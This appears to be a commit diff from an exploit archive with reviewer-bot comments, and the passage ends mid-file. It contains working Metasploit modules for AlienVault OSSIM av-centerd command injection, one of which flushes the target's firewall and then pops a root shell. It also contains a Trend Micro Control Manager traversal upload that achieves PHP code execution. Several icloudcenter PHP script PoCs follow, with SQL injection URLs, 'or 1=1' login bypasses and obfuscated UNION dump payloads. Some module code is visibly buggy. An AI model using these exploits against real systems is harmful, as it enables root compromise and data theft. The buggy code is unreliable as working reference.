args[1].text = "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2"
args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
args[2].text = "#{datastore['RHOST']}"
args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
args[3].text = "#{rand_text_alpha(4 + rand(4))}"
args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
args[4].text = "#{rand_text_alpha(4 + rand(4))}"
if pass == '0'
args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
perl_payload = "system(decode_base64"
perl_payload += "(\"#{Rex::Text.encode_base64("iptables --flush")}\"))"
args[5].text = "|perl -MMIME::Base64 -e '#{perl_payload}';"
elsif pass == '1'
args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
perl_payload = "system(decode_base64"
perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
args[5].text = "|perl -MMIME::Base64 -e '#{perl_payload}';"
end
xml.to_s
end
def send_soap_request(method, timeout=20, action)
if action == 'disable'
soap = build_soap_request(method, '0')
elsif action == 'pop_shell'
soap = build_soap_request(method, '1')
end
res = send_request_cgi({
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util##{method}\""
}
}, timeout)
res
end
def exploit
print_status("Disabling firewall...")
send_soap_request("get_license", 1, "disable")
print_status("Popping shell...")
send_soap_request("get_license", 1, "pop_shell")
end
end
__END__
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_license() {
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $license, $license_type ) = @_;
verbose_log_file(
"LICENSE $license_type:Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre,$license,$license_type)"
);
my $deb='/usr/share/ossim-installer/temp/avl.deb';
my $header='/usr/share/ossim-installer/temp/header';
unlink $deb if ( -f $deb ); #delete previous file if found
unlink $header if ( -f $header ); #delete previous file if found
my $user_agent_uuid = AV::uuid::get_uuid;
$SIG{CHLD} = 'DEFAULT';
my $license_encoded = uri_escape($license);
my $package = system ( "curl --proxy-anyauth -K /etc/curlrc --max-time 20 --user-agent $user_agent_uuid --dump-header $header -o $deb http://data.alienvault.com/avl/$license_type/?license=$license_encoded" );
$SIG{CHLD} = 'IGNORE';
my @out = q{};
if ( !-e $header || -z $header ) {
@out = ( '1', 'Imposible to connect. Please check your network configuration' );
unlink $header;
return \@out;
}
if ( -e $deb ) {
open HEADERFILE, "< $header" or die "Not $!";
my @header_content = <HEADERFILE>;
close(HEADERFILE);
my $response_ok = 0;
foreach (@header_content) {
if ( $_ =~ / 200 OK/) {
$response_ok = 1;
}
}
if ( $response_ok == 0 ) {
@out = ( '1', 'Imposible to connect. Please check your network configuration' );
unlink $header;
unlink $deb;
return \@out;
}
$SIG{CHLD} = 'DEFAULT';
my $command = "/usr/bin/dpkg -i --force-confnew $deb";
verbose_log_file ("LICENSE $license_type: $command");
my $result = qx{$command};
$SIG{CHLD} = 'IGNORE';
$result >>= 8 ;
if ( $result == 0 ) {
verbose_log_file ("LICENSE $license_type: SUCCESS. Installed");
unlink $deb;
unlink $header;
@out = ( '0', 'SUCCESS. Installed' );
return \@out;
}
else
{
verbose_log_file ("LICENSE $license_type: ERROR. Install failed");
@out = ( '2', 'ERROR. Install failed' );
unlink $deb;
unlink $header;
return \@out;
}
}
else
{
my $error_msg;
verbose_log_file ("LICENSE $license_type: ERROR MSG");
open LFILE, "< $header" or die "Not $!";
my @header_msg = <LFILE>;
close(LFILE);
foreach(@header_msg){
verbose_log_file ($_);
if ($_ =~ m/X-AV-ERROR/)
{
$error_msg = $_;
}
}
unlink $header;
@out = ( '2', substr($error_msg, 12, -1)); # Remove 'X-AV-ERROR: 'and \n
return \@out;
}
}
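Review bot: `check` cannot work as written: `send_soap_request("get_dpkg")` passes one argument to `def send_soap_request(method, timeout=20, action)`, whose arity is 2..3, so Ruby raises ArgumentError before any request is sent; and even with an action supplied, neither 'disable' nor 'pop_shell' fits a version probe, so `soap` would be nil for get_dpkg. Give `action` a default (or a separate build path for get_dpkg) and make it a keyword argument. The version comparison `version >= "4.7.0"` is a String comparison, so a hypothetical '4.10.0' sorts below '4.7.0' and would be reported as Appears; use Gem::Version. `exploit` calls send_soap_request with a 1 second timeout on both requests, which is tight for a SOAP::Lite backend, and the first request flushes iptables on the target unconditionally; that side effect should be opt-in and stated in the description. On the Util.pm excerpt, $license_type is interpolated straight into the curl command string passed to system(); validating it against the small set of expected license types before building the command is the fix.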

platforms/linux/remote/42708.rb Executable file

@ -0,0 +1,154 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution',
'Description' => %q{
This module exploits a command injection vulnerability found within the sync_rserver
function in Util.pm. The vulnerability is triggered due to an incomplete blacklist
during the parsing of the $uuid parameter. This allows for the escaping of a system
command allowing for arbitrary command execution as root
},
'References' =>
[
[ 'CVE', '2014-3804' ],
[ 'ZDI', '14-197' ],
[ 'URL', 'http://forums.alienvault.com/discussion/2690' ],
],
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Jun 11 2014')
register_options([
Opt::RPORT(40007),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('CMD', [ false, 'This is the file to download', 'touch /tmp/file.txt'])
], self.class)
end
def run
soap = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"
soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"
soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"
soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n"
soap += "<soap:Body>\r\n"
soap += "<sync_rserver xmlns=\"AV\/CC\/Util\">\r\n"
soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n"
soap += "<c-gensym5 xsi:type=\"xsd:string\">& #{datastore['CMD']} </c-gensym5>\r\n"
soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n"
soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n"
soap += "</sync_rserver>\r\n"
soap += "</soap:Body>\r\n"
soap += "</soap:Envelope>\r\n"
res = send_request_cgi(
{
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util#sync_rserver\""
}
}, 20)
if res && res.code == 200
print_good("Command executed successfully!")
else
print_bad("Something went wrong...")
end
end
end
__END__
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub sync_rserver
{
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname ) = @_;
verbose_log_file(
"SYNC RSERVER TASK : Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre)"
);
if ($uuid =~ /[;`\$\<\>\|]/) {
console_log_file("Not allowed uuid: $uuid in sync_rserver\n");
my @ret = ("Error");
return \@ret;
}
my $conn = Avtools::get_database();
my $sqlfile = "/tmp/sync_${uuid}.sql";
my $sqlfile_old = "/tmp/sync_${uuid}.sql.old";
my $sqlfile_md5 = `md5sum $sqlfile | awk '{print \$1}'`;
my $sqlfile_content;
my $status = 1;
my $counter = 0;
my @ret;
my $query = qq{};
my $dbq;
if ( -f $sqlfile_old )
{
my $sqlfile_old_md5 = `md5sum $sqlfile_old | awk '{print \$1}'`;
debug_log_file ("Old MD5: $sqlfile_old_md5 New MD5: $sqlfile_md5");
if ( $sqlfile_md5 eq $sqlfile_old_md5 )
{
unlink $sqlfile;
verbose_log_file ("Already sync'ed!");
return "0";
}
else
{
unlink $sqlfile_old;
}
}
my $query_array = `ossim-db < $sqlfile 2>&1`;
$query_array =~ s/[\s\n]+$//g;
if ($query_array ne '')
{
$status = $query_array;
}
else
{
$status = 0;
}
if ( ! (defined $status) or $status == 0 )
{
if ( grep /RESTART\sOSSIM\-SERVER/, $sqlfile )
{
verbose_log_file("RESTART OSSIM-SERVER MARK found. Restarting ossim-server");
system('/etc/init.d/ossim-server restart');
}
else
{
debug_log_file("RESTART OSSIM-SERVER MARK not found. Skipping ossim-server restart");
}
$query = qq{REPLACE INTO alienvault.config (conf, value) VALUES ('latest_asset_change', utc_timestamp())};
debug_log_file($query);
$dbq = $conn->prepare($query);
$dbq->execute();
$dbq->finish();
}
else
{
verbose_log_file ("Error syncing rservers: ${status}");
}
debug_log_file("Move file: $sqlfile");
move ($sqlfile, $sqlfile . ".old");
# push @ret, "0";
return "0";
}
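Review bot: the root-cause check in the appended Util.pm source, `if ($uuid =~ /[;`\$\<\>\|]/) {`, is a denylist that omits `&`, and the module relies on exactly that gap: the second SOAP argument, `<c-gensym5 xsi:type=\"xsd:string\">& #{datastore['CMD']} </c-gensym5>`, lands in `$uuid`, which is interpolated into `$sqlfile = "/tmp/sync_${uuid}.sql"` and from there into the backtick command `md5sum $sqlfile | awk '{print \$1}'`. The remediation worth stating in the module text is an allowlist on the uuid (for example `return \@ret unless $uuid =~ /^[0-9a-fA-F-]+$/`) and computing the digest with Digest::MD5 instead of a shell pipeline, so no shell is involved at all. Separately, `print_good("Command executed successfully!")` fires on any HTTP 200, which only shows the SOAP call completed; `sync_rserver` returns normally with `("Error")` or `"0"` whether or not the command ran, so the status line cannot distinguish the two.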

platforms/linux/remote/42709.rb Executable file (171 lines)

@ -0,0 +1,171 @@
require 'msf/core'
require 'rexml/document'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Alienvault OSSIM av-centerd Command Injection get_log_line',
'Description' => %q{
This module exploits a command injection flaw found in the get_log_line
function found within Util.pm. The vulnerability is triggered due to an
unsanitized $r_file parameter passed to a string which is then executed
by the system
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-3805' ],
[ 'OSVDB', '107992' ]
],
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' =>
{
'SSL' => true,
},
'Payload' =>
{
'Compat' => {
'RequiredCmd' => 'perl netcat-e openssl python gawk'
}
},
'DefaultTarget' => 0,
'Targets' =>
[
['Alienvault <= 4.7.0',{}]
],
'DisclosureDate' => 'Jul 18 2014'))
register_options([Opt::RPORT(40007)], self.class)
end
def check
version = ""
res = send_soap_request("get_dpkg")
if res &&
res.code == 200 &&
res.headers['SOAPServer'] &&
res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
version = $1
end
if version.empty? || version >= "4.7.0"
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Appears
end
end
def build_soap_request(method)
xml = Document.new
xml.add_element(
"soap:Envelope",
{
"xmlns:xsi" => "http://www.w3.org/2001/XMLSchema-instance",
"xmlns:soapenc" => "http://schemas.xmlsoap.org/soap/encoding/",
"xmlns:xsd" => "http://www.w3.org/2001/XMLSchema",
"soap:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/",
"xmlns:soap" => "http://schemas.xmlsoap.org/soap/envelope/"
})
body = xml.root.add_element("soap:Body")
m = body.add_element(method, { 'xmlns' => "AV/CC/Util" })
args = []
args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
args[0].text = "All"
args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
args[1].text = "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2"
args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
args[2].text = "#{datastore['RHOST']}"
args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
args[3].text = "#{rand_text_alpha(4 + rand(4))}"
args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
args[4].text = "/var/log/auth.log"
args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
perl_payload = "system(decode_base64"
perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
args[5].text = "1;perl -MMIME::Base64 -e '#{perl_payload}';"
xml.to_s
end
def send_soap_request(method, timeout=20)
soap = build_soap_request(method)
res = send_request_cgi({
'uri' => '/av-centerd',
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap,
'headers' => {
'SOAPAction' => "\"AV/CC/Util##{method}\""
}
}, timeout)
res
end
def exploit
send_soap_request("get_log_line", 1)
end
end
__END__
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_log_line {
my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file, $number_lines )
= @_;
verbose_log_file(
"GET LOG LINE : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$r_file)"
);
my @ret = ("$systemuuid");
if ( $r_file =~ /\.\./ ){
push(@ret,"File not auth");
return \@ret;
}
if ( $number_lines <= 0) {
push(@ret,"Error in number lines");
return \@ret;
}
if (( $r_file =~ /^\/var\/log\// ) or ( $r_file =~ /^\/var\/ossec\/alerts\// ) or ( $r_file =~ /^\/var\/ossec\/logs\// )){
if (! -f "$r_file" ){
push(@ret,"File not found");
return \@ret;
}
push(@ret,"ready");
my $command = "tail -$number_lines $r_file";
#push(@ret,"$command");
#my @content = `tail -$number_lines $r_file`;
my @content = `$command`;
push(@ret,@content);
return \@ret;
}
else {
push(@ret,"path not auth");
return \@ret;
}
}
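Review bot: the `'Description'` attributes the injection to an unsanitized `$r_file`, but the request built in `build_soap_request` puts a fixed `/var/log/auth.log` in `c-gensym11` (which is `$r_file` in the appended `get_log_line`) and the payload `1;perl -MMIME::Base64 -e '#{perl_payload}';` in `c-gensym13`, which is `$number_lines`. In the Perl, `$r_file` is in fact checked for `..`, for a `/var/log/`, `/var/ossec/alerts/` or `/var/ossec/logs/` prefix and for existence with `-f`; `$number_lines` only passes the numeric test `if ( $number_lines <= 0)` (Perl coerces `1;perl ...` to 1 with a warning) before being interpolated into `my $command = "tail -$number_lines $r_file";` and run through backticks. Correct the description, and on the Perl side the fix is `$number_lines =~ /^\d+$/` plus running `tail` without a shell (list-form `open` or `system`). Also, `check` compares versions as strings (`version >= "4.7.0"`), which sorts `4.10.0` below `4.7.0` and reports it as vulnerable; compare with `Gem::Version`.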

platforms/php/remote/42692.rb Executable file (116 lines)

@ -0,0 +1,116 @@
require 'msf/core'
require 'msf/core/exploit/php_exe'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Trend Micro Control Manager importFile Directory Traversal RCE',
'Description' => %q{
This module exploits a directory traversal vulnerability found in Trend Micro
Control Manager. The vulnerability is triggered when sending a specially crafted
fileName (containing ../'s) parameter to the importFile.php script. This will allow
for writing outside of the ImportPolicy directory.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'ZDI', '17-060' ],
[ 'URL', 'https://success.trendmicro.com/solution/1116624' ]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 07 2017'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to TMCM', '/webapp']),
OptBool.new('SSL', [ true, 'Use SSL', true]),
Opt::RPORT(443),
], self.class)
end
def exploit
require 'securerandom'
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
boundary = SecureRandom.hex
payload_name = "#{rand_text_alpha(5)}.php"
print_status("Uploading #{payload_name} to the server...")
cookies = "ASP_NET_SessionId=55hjl0burcvx21uslfxjbabs; "
cookies << "wf_cookie_path=%2F; WFINFOR=#{rand_text_alpha(10)}; "
cookies << "PHPSESSID=fc4o2lg5fpgognc28sjcitugj1; "
cookies << "wf_CSRF_token=bd52b54ced23d3dc257984f68c39d34b; "
cookies << "un=a8cad04472597b0c1163743109dad8f1; userID=1; "
cookies << "LANG=en_US; "
cookies << "wids=modTmcmCriticalEvents%2CmodTmcmUserThreatDetection%2CmodTmcmAppStatusSrv%2CmodTmcmTopThreats%2CmodTmcmEndpointThreatDetection%2CmodTmcmCompCompliance%2C; "
cookies << "lastID=65; cname=mainConsole; theme=default; lastTab=-1"
post_body = []
post_body << "--#{boundary}\r\n"
post_body << "Content-Disposition: form-data; name=\"action\"\r\n\r\n"
post_body << "importPolicy\r\n"
post_body << "--#{boundary}\r\n"
post_body << "Content-Disposition: form-data; name=\"fileSize\"\r\n\r\n"
post_body << "2097152\r\n"
post_body << "--#{boundary}\r\n"
post_body << "Content-Disposition: form-data; name=\"fileName\"\r\n\r\n"
post_body << "../../../widget_60_2899/repository/db/sqlite/#{payload_name}\r\n"
post_body << "--#{boundary}\r\n"
post_body << "Content-Disposition: form-data; name=\"filename\";\r\n"
post_body << "filename=\"policy.cmpolicy\"\r\n"
post_body << "Content-Type: application/octet-stream\r\n\r\n"
post_body << "<?php #{payload.raw} ?>\r\n\r\n"
post_body << "--#{boundary}--\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri("#{uri}", "widget", "repository", "widgetPool", "wp1", "widgetBase", "modTMCM", "inc", "importFile.php"),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_body.join,
'headers' => {
'Cookie' => cookies,
'Accept-Encoding' => "gzip;q=1.0,deflate;q=0.6,identity;q=0.3",
'Connection' => "close",
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5",
},
})
if res.body =~ /Import Successfully/
print_good("#{payload_name} uploaded successfully!")
print_status("Attempting to execute payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("#{uri}", "widget_60_2899", "repository", "db", "sqlite", "#{payload_name}"),
'headesr' => {
'Cookie' => cookies
}
})
else
print_error("Something went wrong...")
end
end
end
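Review bot: `'headesr'` in the second `send_request_cgi` call is a typo, so the `Cookie` header is silently dropped from the GET that fetches the uploaded file (the key is not one `send_request_cgi` recognises). In the same `exploit` method, `if res.body =~ /Import Successfully/` dereferences `res` without a nil check, so a connection failure raises a `NoMethodError` instead of reaching `print_error("Something went wrong...")`. From the defender's side the `fileName` value `../../../widget_60_2899/repository/db/sqlite/#{payload_name}` shows what the vendor fix referenced at `https://success.trendmicro.com/solution/1116624` has to do: canonicalize `fileName`, reject path separators and `..`, and write only under the `ImportPolicy` directory named in the description.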

platforms/php/webapps/42667.txt Executable file (31 lines)

@ -0,0 +1,31 @@
# # # # #
# Exploit Title: Unique Low Bid Auction Script 3.3 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/unique-low-bid-auction-script.htm
# Demo: http://www.icloudcenter.net/demos/iclowbidauction/
# Version: 3.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin
#
# User: 'or 1=1 or ''=' Pass: anything
#
# http://localhost/[PATH]/admin/viewuserips.php?id=[SQL]
# http://localhost/[PATH]/admin/editadminuser.php?id=[SQL]
#
# Etc..
# # # # #
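Review bot: the `# Description:` line (`The vulnerability allows an attacker to inject sql commands....`) is template text and names no file or parameter; the PoC is more specific, so the description should state that the `admin` login accepts `'or 1=1 or ''='` as the user name (which means the login query is built by string concatenation) and that `id` in `admin/viewuserips.php` and `admin/editadminuser.php` is injectable. `# Etc..` should either list the remaining endpoints or be dropped. The remediation the vendor needs is the same for all the icloudcenter scripts in this commit: parameterized queries (PDO or mysqli prepared statements) and a numeric check on `id`.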

platforms/php/webapps/42668.txt Executable file (27 lines)

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: MLM Software Script 2.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/mlm-script.htm
# Demo: http://www.icloudcenter.net/demos/icmlm/
# Version: 2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# '+/*!00007uNiOn*/+/*!00007SelEct*/+0x283129,0x283229,0x3c68313e496873616e2053656e63616e3c2f68313e,(/*!50000Select*/+export_set(5,@:=0,(/*!50000select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!50000table_name*/,0x3c6c693e,2),/*!50000column_name*/,0xa3a,2)),@,2))--+-
#
# Etc..
# # # # #
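Review bot: the PoC payload uses MySQL version-comment syntax (`/*!00007uNiOn*/+/*!00007SelEct*/`) and `export_set` over `information_schema.columns`, which tells the reader two things the text does not say: the back end is MySQL, and a keyword denylist on `union`/`select` for the `key` parameter is not a fix, since the server evaluates the commented keywords. State both in the description and name the vulnerable value explicitly as `key` in `index.php?page=static_pages`; the same vector is reported for 42669, 42671, 42672, 42679, 42680, 42681, 42682, 42684 and 42686 in this commit (42677 and 42678 use `page=static_page`), so a single consolidated remediation note (prepared statements) would serve all of them.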

platforms/php/webapps/42669.txt Executable file (25 lines)

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Hotel Reservation Site Script 3.3 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/hotel-reservation-site-script.htm
# Demo: http://icloudcenter.net/demos/ichotelreservation/
# Version: 3.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42670.txt Executable file (25 lines)

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: eBay like Auction PHP Script 2.2 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/ebay-like-auction-script.htm
# Demo: http://icloudcenter.net/demos/icauction/
# Version: 2.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/item.php?id=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42671.txt Executable file (25 lines)

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Doctor Appointment Script 1.3 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/doctor-appointment-script.htm
# Demo: http://icloudcenter.net/demos/icdoctorappointment/
# Version: 1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42672.txt Executable file (25 lines)

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Restaurant Site Script 1.4 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/restaurant-site-script.htm
# Demo: http://icloudcenter.net/demos/icrestaurant/
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42673.txt Executable file (31 lines)

@ -0,0 +1,31 @@
# # # # #
# Exploit Title: Dutch Auction Script 1.2 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/dutch-auction-script.htm
# Demo: http://icloudcenter.net/demos/icdutchauction/
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin
#
# User: 'or 1=1 or ''=' Pass: anything
#
# http://localhost/[PATH]/admin/viewuserips.php?id=[SQL]
# http://localhost/[PATH]/admin/editadminuser.php?id=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42674.txt Executable file (29 lines)

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Auto Dealer Car Sales PHP Script 2.2 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/auto-dealer-car-sales-script.htm
# Demo: http://icloudcenter.net/demos/icautosales/
# Version: 2.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?cmd=do_car_search&type=7&mod_id=[SQL]
#
# http://localhost/[PATH]/index.php?cmd=advertise_details&category=car&aid=[SQL]
#
# http://localhost/[PATH]/index.php?cmd=directory&parent=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42675.txt Executable file (27 lines)

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Travel Site Script 2.2 - Authentication Bypass
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/traveling-website-script.htm
# Demo: http://icloudcenter.net/demos/ICPenny/
# Version: 2.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/admin
#
# User: 'or 1=1 or ''=' Pass: anything
#
# Etc..
# # # # #
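Review bot: the title says `Authentication Bypass` while `# Description:` still reads `inject sql commands`, and `# Demo:` points at `demos/ICPenny/` rather than a demo of the traveling website script named in `# Software Link:`. The PoC (`User: 'or 1=1 or ''='`) shows the bypass is an SQL injection in the admin login form, so say that in the description and correct the demo URL.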

platforms/php/webapps/42676.txt Executable file (31 lines)

@ -0,0 +1,31 @@
# # # # #
# Exploit Title: Classifieds Software Script Like Craigslist 1.1 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Link: http://www.icloudcenter.com/craigslist-like-classifieds-script.htm
# Demo: http://icloudcenter.net/demos/icclassifieds/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/post_details.php?city=0&id=[SQL]
#
# -3061'++/*!00004UNION*/+/*!00004SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,(/*!00004Select*/+export_set(5,@:=0,(/*!00004select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00004table_name*/,0x3c6c693e,2),/*!00004column_name*/,0xa3a,2)),@,2)),0x496873616e2053656e63616e,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137--+-
#
# http://localhost/[PATH]/view_posts.php?city=[SQL]
#
# http://localhost/[PATH]/index.php?c=[SQL]
#
# Etc..
# # # # #

platforms/php/webapps/42677.txt Executable file (27 lines)

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Students Course Assessment Test Script 1.2 - SQL Injection
# Dork: N/A
# Date: 13.09.2017
# Vendor Homepage: http://www.icloudcenter.com/
